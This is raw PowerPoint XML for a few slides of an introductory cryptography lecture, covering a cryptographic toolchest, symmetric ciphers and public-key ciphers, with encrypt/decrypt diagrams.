            <a:off x="1524000" y="1295400"/>
            <a:ext cx="9144000" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25400"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23160100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A37C31B-805F-4A28-ABBA-1D6521D4577A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30724" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271849" y="228600"/>
            <a:ext cx="11644027" cy="700548"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cryptographic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE"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toolchest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30725" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019428" y="1884218"/>
            <a:ext cx="9940413" cy="3857818"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Symmetric ciphers (includes classical ciphers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200" algn="l" defTabSz="912813">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Block ciphers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200" algn="l" defTabSz="912813">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stream ciphers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200" algn="l" defTabSz="912813">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Codes</a:t>
            </a:r>
          </a:p>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Asymmetric ciphers (Public Key)</a:t>
            </a:r>
          </a:p>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Cryptographic hashes</a:t>
            </a:r>
          </a:p>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Entropy and random numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l" defTabSz="912813">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protocols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and key management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5525067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04D48849-B45C-48CB-A0AE-1E7B02EB7FC2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31748" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222422" y="265171"/>
            <a:ext cx="11693453" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Symmetric ciphers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31749" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884538" y="3769705"/>
            <a:ext cx="10651524" cy="2549574"/>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Encryption and Decryption use the same key.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transformations are simple and fast enough for practical implementation and use.</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Two major types: Stream ciphers and block ciphers.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Examples: DES, AES, RC4, A5, Enigma, SIGABA, etc.</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Can’t be used for key distribution or authentication.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31750" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3812460" y="1643982"/>
            <a:ext cx="1216734" cy="668708"/>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31751" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="2787388"/>
            <a:ext cx="908050" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Key (k)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31752" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3078480" y="1995487"/>
            <a:ext cx="73152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1753" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="1552575"/>
            <a:ext cx="1905000" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ciphertext (C)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31754" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="1688227"/>
            <a:ext cx="938077" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Encrypt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(P)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31757" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1578111" y="1805381"/>
            <a:ext cx="1524000" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Plaintext (P)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31758" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="1691696"/>
            <a:ext cx="1142995" cy="589478"/>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31759" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="2810537"/>
            <a:ext cx="908050" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Key (k)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31761" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9067800" y="1793089"/>
            <a:ext cx="1524000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Plaintext (P)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31762" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7412048" y="1646900"/>
            <a:ext cx="949299" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Decrypt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(P)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31764" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8458200" y="1995487"/>
            <a:ext cx="6096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3" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="1995487"/>
            <a:ext cx="2286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8" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4419600" y="2330187"/>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
        <p:nvSpPr>
          <p:cNvPr id="29" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7848600" y="2295462"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4558135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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1377799" y="208336"/>
            <a:ext cx="9352005" cy="1138777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Asymmetric (Public Key) ciphers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22533" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630195" y="3522702"/>
            <a:ext cx="10456067" cy="2699294"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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Encryption and Decryption use different keys.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is called the public key and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is the private key.  Knowledge of P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is sufficient to encrypt.  Given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and C, it is infeasible to compute p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and infeasible to compute P from C.</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Invented in mid 70’s –Hellman, Merkle, Rivest, Shamir, Adelman, Ellis, Cocks, Williamson</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Public Key systems  used to distribute keys, sign documents. Used in https:. Much slower than symmetric schemes.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Example public key systems: RSA-4096, ECC-521, Mc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Eliece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, RLWE-Lattice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="1626154"/>
            <a:ext cx="1219196" cy="717545"/>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3" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3634450" y="2784768"/>
            <a:ext cx="1762022" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Public Key (P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3078480" y="2007155"/>
            <a:ext cx="73152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5" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="1564243"/>
            <a:ext cx="1905000" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ciphertext (C)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="1626155"/>
            <a:ext cx="10223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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(P)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="1778556"/>
            <a:ext cx="1524000" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Plaintext (P)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="1660575"/>
            <a:ext cx="1143000" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7086600" y="2773193"/>
            <a:ext cx="1826142" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
